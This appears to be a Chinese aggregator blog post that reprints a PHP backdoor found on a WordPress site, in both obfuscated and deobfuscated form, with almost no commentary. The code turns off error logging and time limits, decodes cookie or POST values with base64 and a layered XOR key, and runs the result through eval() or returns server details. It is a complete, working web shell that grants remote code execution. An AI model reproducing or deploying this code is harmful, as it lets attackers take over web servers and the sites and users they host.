一段加密的后门代码
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了一段加密的后门代码相关的知识,希望对你有一定的参考价值。
代码解密:https://malwaredecoder.com/result/fc0d676e44b62985879f8f61a598df7a一段后门代码:
<?php ${"\x47\x4c\x4fB\x41LS"}["s\x70\x72\x62\x77l\x6fi"]="\x6f\x75t_\x64\x61\x74\x61";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["w\x64k\x71e\x67\x62t\x73"]="\x6b\x65\x79\x33";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x72\x65\x64\x73ob\x64\x67\x66\x77"]="\x6b\x65\x79\x32";${"\x47L\x4f\x42\x41\x4c\x53"}["\x63x\x76t\x73\x72\x63\x77r"]="\x6e";${"G\x4c\x4fBAL\x53"}["ud\x77\x77\x78e\x69\x6e\x6as"]="c";${"G\x4c\x4fB\x41\x4c\x53"}["ct\x78\x67\x76qg\x6cvo\x67"]="\x70";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x73j\x68y\x77\x6e\x68"]="\x73";${"\x47L\x4f\x42ALS"}["\x72d\x68ii\x76\x67\x72\x6d"]="\x62a\x73\x656\x34\x69\x6ev";${"\x47\x4cO\x42\x41\x4cS"}["\x6f\x69\x6d\x66\x77p\x62v\x73"]="i";${"\x47\x4cO\x42\x41\x4cS"}["\x78\x65\x66ud\x77\x65\x6b\x71\x78\x72"]="b\x61s\x65\x36\x34\x63\x68\x61r\x73";${"\x47LO\x42\x41LS"}["\x6a\x6boz\x74\x6f\x67\x6b"]="\x64";${"\x47\x4c\x4f\x42\x41LS"}["\x6a\x66du\x62\x66\x73y"]="\x61";${"G\x4c\x4f\x42AL\x53"}["\x70\x70\x6d\x75\x79\x76i"]="\x72";${"\x47L\x4f\x42A\x4c\x53"}["\x66km\x79\x71\x65\x78"]="\x61\x6b";${"\x47LOB\x41\x4cS"}["\x6e\x76\x69\x71\x70\x68\x6c"]="da\x74\x61";${"\x47\x4c\x4f\x42\x41LS"}["q\x6c\x79\x6d\x6f\x6b\x66zoe"]="key";@ini_set("\x65\x72\x72\x6f\x72_l\x6fg",NULL);@ini_set("\x6c\x6fg\x5f\x65rr\x6fr\x73",0);@ini_set("\x6d\x61\x78_\x65x\x65\x63u\x74\x69\x6f\x6e_\x74\x69m\x65",0);@set_time_limit(0);array_walk($_COOKIE,"e\x6eu\x6d\x65r\x61\x74o\x72");array_walk($_POST,"\x65nu\x6d\x65rator");function enumerator($value,$key){${"\x47\x4cOB\x41\x4c\x53"}["\x77b\x6e\x72\x64\x66"]="d\x61ta";${"\x47\x4c\x4f\x42A\x4c\x53"}["x\x76\x73\x77\x6d\x74\x76\x79o\x64"]="\x76a\x6c\x75e";${${"G\x4c\x4f\x42A\x4c\x53"}["w\x62\x6erd\x66"]}[email protected](decode(get_params(${${"GLO\x42AL\x53"}["\x78\x76\x73\x77\x6d\x74\x76\x79od"]}),${${"G\x4cO\x42A\x4cS"}["q\x6c\x79mok\x66\x7ao\x65"]}));@extract(${${"\x47L\x4fBA\x4c\x53"}["\x6e\x76i\x71\x70\x68\x6c"]});if(isset(${${"GL\x4f\x42\x41LS"}["\x66\x6b\x6d\x79\x71\x65\x78"]})){${"G\x4c\x4f\x42A\x4c\x53"}["\x6bd\x63cuu\x74\x6a\x63cpn"]="\x72";${${"\x47L\x4f\x42\x41\x4c\x53"}["\x6bd\x63\x63\x75\x75\x74\x6a\x63\x63p\x6e"]}=array();${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6a\x6b\x62\x6c\x61l\x69"]="\x61";$dnyyrqcjhbg="\x72";${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x70\x70\x6d\x75\x79v\x69"]}["\x73".chr(118)]=chr(49).".\x30-3";$kwshfzxow="\x72";${$dnyyrqcjhbg}["p".chr(118)]=PHP_VERSION;if(ord(${${"GL\x4f\x42\x41\x4cS"}["\x6a\x66d\x75\x62\x66\x73\x79"]})==105)[email protected](${$kwshfzxow});elseif(ord(${${"G\x4c\x4f\x42\x41\x4c\x53"}["j\x6b\x62l\x61\x6c\x69"]})==101)eval(${${"\x47\x4cO\x42A\x4c\x53"}["j\x6b\x6f\x7a\x74\x6f\x67\x6b"]});exit();}}function get_params($s){$egmozpvqw="c";$dvhtoerid="ba\x73\x65\x36\x34\x63ha\x72\x73";${"\x47\x4cOB\x41L\x53"}["\x69\x61\x6b\x74\x61\x65p\x7a\x6bolt"]="\x73";${${"\x47LO\x42\x41\x4cS"}["\x78e\x66u\x64\x77e\x6b\x71\x78r"]}="\x41B\x43\x44\x45FG\x48I\x4aKLMN\x4f\x50\x51\x52S\x54\x55V\x57X\x59Z\x61\x62\x63\x64ef\x67\x68i\x6akl\x6d\x6eop\x71\x72s\x74u\x76w\x78y\x7a012\x334\x356\x3789+/";${"\x47L\x4f\x42A\x4c\x53"}["\x75\x64\x67m\x6ft\x6cl\x72\x71q\x79"]="r";$navmbtcm="\x70";$hbzvyvtkwl="\x70";$lksboqor="\x73";${"\x47\x4c\x4f\x42A\x4cS"}["\x6ecd\x67q\x72\x75\x73\x6fdb"]="\x62a\x73e\x364\x69\x6e\x76";$pjitegq="\x73";${${"\x47L\x4f\x42A\x4c\x53"}["\x6e\x63\x64\x67q\x72u\x73od\x62"]}=Array();${"G\x4c\x4f\x42\x41\x4cS"}["\x61\x68\x72\x63d\x68\x6blj\x63h\x66"]="s";${"\x47\x4c\x4f\x42\x41LS"}["\x73\x77\x7a\x6ad\x6dme\x6b"]="r";for(${${"\x47L\x4f\x42\x41\x4c\x53"}["\x6fi\x6dfwpb\x76\x73"]}=0;${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6f\x69\x6df\x77\x70bvs"]}<strlen(${$dvhtoerid});${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x6f\x69\x6d\x66\x77\x70b\x76\x73"]}++){${${"\x47L\x4f\x42\x41\x4c\x53"}["\x72\x64h\x69i\x76g\x72\x6d"]}[${${"G\x4cOB\x41L\x53"}["\x78\x65\x66\x75d\x77\x65\x6b\x71\x78\x72"]}[${${"\x47LO\x42\x41\x4c\x53"}["\x6f\x69\x6dfw\x70\x62v\x73"]}]]=${${"\x47\x4c\x4f\x42AL\x53"}["o\x69\x6d\x66\x77p\x62v\x73"]};}${${"G\x4c\x4fB\x41\x4c\x53"}["s\x6a\x68y\x77\x6e\x68"]}=preg_replace("~[^A-\x5a\x61-z\x30-\x39\x5c+\x5c/\x5c=]\x7e","",${$lksboqor});${$hbzvyvtkwl}=${${"G\x4c\x4f\x42A\x4c\x53"}["\x73j\x68ywn\x68"]}[strlen(${${"G\x4c\x4f\x42\x41\x4cS"}["a\x68r\x63\x64h\x6b\x6cj\x63h\x66"]})-1]=="\x3d"?(${${"\x47\x4c\x4f\x42A\x4cS"}["\x73\x6ah\x79\x77\x6e\x68"]}[strlen(${${"G\x4cOB\x41L\x53"}["\x73\x6ahy\x77n\x68"]})-2]=="="?"AA":"\x41"):"";${"GL\x4f\x42A\x4cS"}["\x6ai\x68\x6bu\x6d\x79\x72\x6eq\x63"]="\x72";${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x75\x64\x67\x6d\x6ft\x6c\x6cr\x71\x71\x79"]}="";${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x73\x6ah\x79\x77\x6eh"]}=substr(${$pjitegq},0,strlen(${${"GL\x4f\x42\x41\x4cS"}["\x69\x61\x6b\x74\x61\x65\x70\x7a\x6bo\x6ct"]})-strlen(${$navmbtcm})).${${"GL\x4f\x42\x41\x4c\x53"}["\x63t\x78g\x76\x71gl\x76o\x67"]};for(${$egmozpvqw}=0;${${"\x47\x4cOB\x41\x4c\x53"}["\x75\x64\x77wx\x65\x69\x6ejs"]}<strlen(${${"\x47\x4cOBA\x4c\x53"}["s\x6a\x68\x79\x77nh"]});${${"\x47LO\x42\x41L\x53"}["\x75\x64\x77w\x78\x65\x69\x6ej\x73"]}+=4){${"\x47\x4cO\x42ALS"}["\x6a\x77in\x71\x6dw\x62\x63"]="s";${"\x47\x4c\x4f\x42\x41L\x53"}["\x61\x6ee\x64\x71\x65\x79\x76\x62"]="\x6e";$pwqkwj="\x62\x61se\x36\x34i\x6e\x76";$fyojtix="n";$gkrhxxtopl="s";${"GL\x4fB\x41\x4c\x53"}["\x74mv\x6a\x68k\x6c\x64"]="s";${"\x47\x4cO\x42\x41L\x53"}["a\x7a\x73o\x6f\x68\x78n\x75wz\x76"]="c";${"G\x4cOB\x41\x4c\x53"}["\x74\x6al\x75\x6c\x61\x76\x69\x67\x64"]="n";${${"GL\x4f\x42\x41\x4c\x53"}["c\x78\x76t\x73\x72\x63\x77\x72"]}=(${${"\x47\x4c\x4fBA\x4cS"}["\x72\x64\x68iiv\x67\x72\x6d"]}[${${"G\x4c\x4fB\x41LS"}["\x73\x6ah\x79\x77nh"]}[${${"\x47\x4c\x4f\x42AL\x53"}["\x61\x7a\x73o\x6fh\x78\x6e\x75\x77\x7av"]}]]<<18)+(${${"\x47\x4c\x4fB\x41LS"}["\x72\x64h\x69\x69v\x67\x72\x6d"]}[${${"\x47L\x4fBA\x4cS"}["j\x77\x69\x6e\x71\x6d\x77\x62\x63"]}[${${"G\x4c\x4f\x42A\x4cS"}["\x75\x64w\x77x\x65i\x6e\x6as"]}+1]]<<12)+(${${"GLO\x42\x41L\x53"}["r\x64\x68i\x69v\x67rm"]}[${$gkrhxxtopl}[${${"\x47\x4cOB\x41L\x53"}["ud\x77\x77xe\x69n\x6as"]}+2]]<<6)+${$pwqkwj}[${${"G\x4c\x4fB\x41\x4c\x53"}["\x74m\x76\x6a\x68\x6bld"]}[${${"\x47\x4cO\x42\x41L\x53"}["u\x64\x77w\x78ei\x6ejs"]}+3]];${${"\x47\x4c\x4fB\x41\x4c\x53"}["p\x70m\x75\x79\x76\x69"]}.=chr((${${"\x47\x4cO\x42A\x4c\x53"}["\x74\x6a\x6cu\x6c\x61\x76\x69\x67d"]}>>16)&255).chr((${${"\x47\x4cOBA\x4c\x53"}["a\x6ee\x64q\x65\x79\x76\x62"]}>>8)&255).chr(${$fyojtix}&255);}return substr(${${"\x47L\x4fBAL\x53"}["\x73\x77z\x6a\x64m\x6dek"]},0,strlen(${${"\x47\x4cO\x42\x41\x4cS"}["\x6a\x69\x68\x6b\x75\x6dy\x72\x6e\x71\x63"]})-strlen(${${"\x47LOB\x41LS"}["\x63\x74\x78\x67vq\x67l\x76\x6fg"]}));}function decode($data,$key){${"\x47L\x4f\x42ALS"}["n\x7a\x78z\x78\x68d\x75i\x77\x66"]="\x69";${"GLO\x42\x41L\x53"}["\x78i\x71\x77\x62\x64k\x77"]="\x6be\x79\x33";${"\x47\x4cOB\x41L\x53"}["h\x78\x6e\x74\x73\x6d"]="\x64\x61\x74a";$nfcrlzoqiyym="\x69";$ofbkzgrupiv="\x6fu\x74\x5fda\x74a";${"GLOB\x41\x4c\x53"}["ei\x61l\x75\x74\x75"]="\x69";${${"\x47L\x4fB\x41\x4cS"}["r\x65d\x73\x6fb\x64g\x66w"]}="0\x38ae\x381a2-\x6545\x31-4\x63\x39\x38-88c\x65-9d2\x32562\x66\x30\x61\x630";${"G\x4c\x4fB\x41L\x53"}["nm\x74ku\x6b\x64\x65"]="\x6f\x75t\x5fda\x74\x61";$eykvvkxfgb="\x69";$hlrlfgf="\x6be\x79";${${"\x47\x4c\x4fBA\x4cS"}["\x77\x64\x6b\x71\x65\x67\x62t\x73"]}=pack("\x48*","0\x34\x35d07\x35\x33\x30\x62\x350\x3035\x3700\x354\x35\x35\x35\x37\x35\x35\x30\x300\x305\x36\x35\x380e\x30\x30\x30\x31\x309500\x31\x3000\x66\x30\x32\x350\x30b\x30\x630\x30\x30\x3751\x3555\x33\x357\x35\x32");${$ofbkzgrupiv}="";${"GL\x4fBA\x4c\x53"}["o\x67y\x63\x73\x66\x71\x70q"]="key\x33";for(${$nfcrlzoqiyym}=0;${${"G\x4c\x4fBA\x4cS"}["n\x7ax\x7ax\x68\x64u\x69\x77\x66"]}<strlen(${${"\x47\x4cO\x42\x41L\x53"}["\x6e\x76\x69\x71\x70hl"]});${${"\x47\x4cOB\x41L\x53"}["\x6f\x69\x6d\x66\x77\x70\x62\x76\x73"]}++)${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x73p\x72b\x77\x6c\x6f\x69"]}.=${${"\x47L\x4f\x42A\x4c\x53"}["\x68x\x6et\x73\x6d"]}[${$eykvvkxfgb}]^${$hlrlfgf}[${${"\x47L\x4f\x42\x41LS"}["\x6fi\x6df\x77\x70\x62v\x73"]}%strlen(${${"\x47\x4cO\x42\x41\x4cS"}["\x71\x6c\x79\x6d\x6f\x6b\x66\x7ao\x65"]})]^${${"\x47\x4cOB\x41L\x53"}["\x72\x65d\x73o\x62\x64\x67\x66\x77"]}[${${"GLOB\x41\x4c\x53"}["ei\x61l\x75\x74u"]}%strlen(${${"\x47\x4cO\x42\x41LS"}["\x72\x65\x64s\x6f\x62\x64\x67\x66w"]})]^${${"GL\x4f\x42\x41\x4c\x53"}["\x6f\x67\x79\x63\x73f\x71\x70q"]}[${${"\x47\x4cO\x42A\x4cS"}["oi\x6df\x77\x70\x62\x76\x73"]}%strlen(${${"\x47\x4c\x4fB\x41\x4cS"}["\x78i\x71\x77\x62\x64\x6bw"]})];return${${"\x47\x4c\x4f\x42A\x4c\x53"}["n\x6d\x74k\x75\x6b\x64\x65"]};}
?><pre align=center><form>wordpress</form></pre>
解密后的代码:
${"GLOBALS"}["sprbwloi"]="out_data";${"GLOBALS"}["wdkqegbts"]="key3";${"GLOBALS"}["redsobdgfw"]="key2";${"GLOBALS"}["cxvtsrcwr"]="n";${"GLOBALS"}["udwwxeinjs"]="c";${"GLOBALS"}["ctxgvqglvog"]="p";${"GLOBALS"}["sjhywnh"]="s";${"GLOBALS"}["rdhiivgrm"]="base64inv";${"GLOBALS"}["oimfwpbvs"]="i";${"GLOBALS"}["xefudwekqxr"]="base64chars";${"GLOBALS"}["jkoztogk"]="d";${"GLOBALS"}["jfdubfsy"]="a";${"GLOBALS"}["ppmuyvi"]="r";${"GLOBALS"}["fkmyqex"]="ak";${"GLOBALS"}["nviqphl"]="data";${"GLOBALS"}["qlymokfzoe"]="key";@ini_set("error_log",NULL);@ini_set("log_errors",0);@ini_set("max_execution_time",0);@set_time_limit(0);array_walk($_COOKIE,"enumerator");array_walk($_POST,"enumerator");function enumerator($value,$key){${"GLOBALS"}["wbnrdf"]="data";${"GLOBALS"}["xvswmtvyod"]="value";${${"GLOBALS"}["wbnrdf"]}[email protected](decode(get_params(${${"GLOBALS"}["xvswmtvyod"]}),${${"GLOBALS"}["qlymokfzoe"]}));@extract(${${"GLOBALS"}["nviqphl"]});if(isset(${${"GLOBALS"}["fkmyqex"]})){${"GLOBALS"}["kdccuutjccpn"]="r";${${"GLOBALS"}["kdccuutjccpn"]}=array();${"GLOBALS"}["jkblali"]="a";$dnyyrqcjhbg="r";${${"GLOBALS"}["ppmuyvi"]}["sv"]="1.0-3";$kwshfzxow="r";${$dnyyrqcjhbg}["pv"]=PHP_VERSION;if(ord(${${"GLOBALS"}["jfdubfsy"]})==105)[email protected](${$kwshfzxow});elseif(ord(${${"GLOBALS"}["jkblali"]})==101)eval(${${"GLOBALS"}["jkoztogk"]});}}function get_params($s){$egmozpvqw="c";$dvhtoerid="base64chars";${"GLOBALS"}["iaktaepzkolt"]="s";${${"GLOBALS"}["xefudwekqxr"]}="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";${"GLOBALS"}["udgmotllrqqy"]="r";$navmbtcm="p";$hbzvyvtkwl="p";$lksboqor="s";${"GLOBALS"}["ncdgqrusodb"]="base64inv";$pjitegq="s";${${"GLOBALS"}["ncdgqrusodb"]}=Array();${"GLOBALS"}["ahrcdhkljchf"]="s";${"GLOBALS"}["swzjdmmek"]="r";for(${${"GLOBALS"}["oimfwpbvs"]}=0;${${"GLOBALS"}["oimfwpbvs"]}<strlen(${$dvhtoerid});${${"GLOBALS"}["oimfwpbvs"]}++){${${"GLOBALS"}["rdhiivgrm"]}[${${"GLOBALS"}["xefudwekqxr"]}[${${"GLOBALS"}["oimfwpbvs"]}]]=${${"GLOBALS"}["oimfwpbvs"]};}${${"GLOBALS"}["sjhywnh"]}=preg_replace("~[^A-Za-z0-9\+\/\=]~","",${$lksboqor});${$hbzvyvtkwl}=${${"GLOBALS"}["sjhywnh"]}[strlen(${${"GLOBALS"}["ahrcdhkljchf"]})-1]=="="?(${${"GLOBALS"}["sjhywnh"]}[strlen(${${"GLOBALS"}["sjhywnh"]})-2]=="="?"AA":"A"):"";${"GLOBALS"}["jihkumyrnqc"]="r";${${"GLOBALS"}["udgmotllrqqy"]}="";${${"GLOBALS"}["sjhywnh"]}=substr(${$pjitegq},0,strlen(${${"GLOBALS"}["iaktaepzkolt"]})-strlen(${$navmbtcm})).${${"GLOBALS"}["ctxgvqglvog"]};for(${$egmozpvqw}=0;${${"GLOBALS"}["udwwxeinjs"]}<strlen(${${"GLOBALS"}["sjhywnh"]});${${"GLOBALS"}["udwwxeinjs"]}+=4){${"GLOBALS"}["jwinqmwbc"]="s";${"GLOBALS"}["anedqeyvb"]="n";$pwqkwj="base64inv";$fyojtix="n";$gkrhxxtopl="s";${"GLOBALS"}["tmvjhkld"]="s";${"GLOBALS"}["azsoohxnuwzv"]="c";${"GLOBALS"}["tjlulavigd"]="n";${${"GLOBALS"}["cxvtsrcwr"]}=(${${"GLOBALS"}["rdhiivgrm"]}[${${"GLOBALS"}["sjhywnh"]}[${${"GLOBALS"}["azsoohxnuwzv"]}]]<<18)+(${${"GLOBALS"}["rdhiivgrm"]}[${${"GLOBALS"}["jwinqmwbc"]}[${${"GLOBALS"}["udwwxeinjs"]}+1]]<<12)+(${${"GLOBALS"}["rdhiivgrm"]}[${$gkrhxxtopl}[${${"GLOBALS"}["udwwxeinjs"]}+2]]<<6)+${$pwqkwj}[${${"GLOBALS"}["tmvjhkld"]}[${${"GLOBALS"}["udwwxeinjs"]}+3]];${${"GLOBALS"}["ppmuyvi"]}.=chr((${${"GLOBALS"}["tjlulavigd"]}>>16)&255).chr((${${"GLOBALS"}["anedqeyvb"]}>>8)&255).chr(${$fyojtix}&255);}return substr(${${"GLOBALS"}["swzjdmmek"]},0,strlen(${${"GLOBALS"}["jihkumyrnqc"]})-strlen(${${"GLOBALS"}["ctxgvqglvog"]}));}function decode($data,$key){${"GLOBALS"}["nzxzxhduiwf"]="i";${"GLOBALS"}["xiqwbdkw"]="key3";${"GLOBALS"}["hxntsm"]="data";$nfcrlzoqiyym="i";$ofbkzgrupiv="out_data";${"GLOBALS"}["eialutu"]="i";${${"GLOBALS"}["redsobdgfw"]}="08ae81a2-e451-4c98-88ce-9d22562f0ac0";${"GLOBALS"}["nmtkukde"]="out_data";$eykvvkxfgb="i";$hlrlfgf="key";${${"GLOBALS"}["wdkqegbts"]}=pack("H*","045d07530b5003570054555755000056580e0001095001000f02500b0c00075155535752");${$ofbkzgrupiv}="";${"GLOBALS"}["ogycsfqpq"]="key3";for(${$nfcrlzoqiyym}=0;${${"GLOBALS"}["nzxzxhduiwf"]}<strlen(${${"GLOBALS"}["nviqphl"]});${${"GLOBALS"}["oimfwpbvs"]}++)${${"GLOBALS"}["sprbwloi"]}.=${${"GLOBALS"}["hxntsm"]}[${$eykvvkxfgb}]^${$hlrlfgf}[${${"GLOBALS"}["oimfwpbvs"]}%strlen(${${"GLOBALS"}["qlymokfzoe"]})]^${${"GLOBALS"}["redsobdgfw"]}[${${"GLOBALS"}["eialutu"]}%strlen(${${"GLOBALS"}["redsobdgfw"]})]^${${"GLOBALS"}["ogycsfqpq"]}[${${"GLOBALS"}["oimfwpbvs"]}%strlen(${${"GLOBALS"}["xiqwbdkw"]})];return${${"GLOBALS"}["nmtkukde"]};}<pre align=center><form>wordpress</form></pre>
以上是关于一段加密的后门代码的主要内容,如果未能解决你的问题,请参考以下文章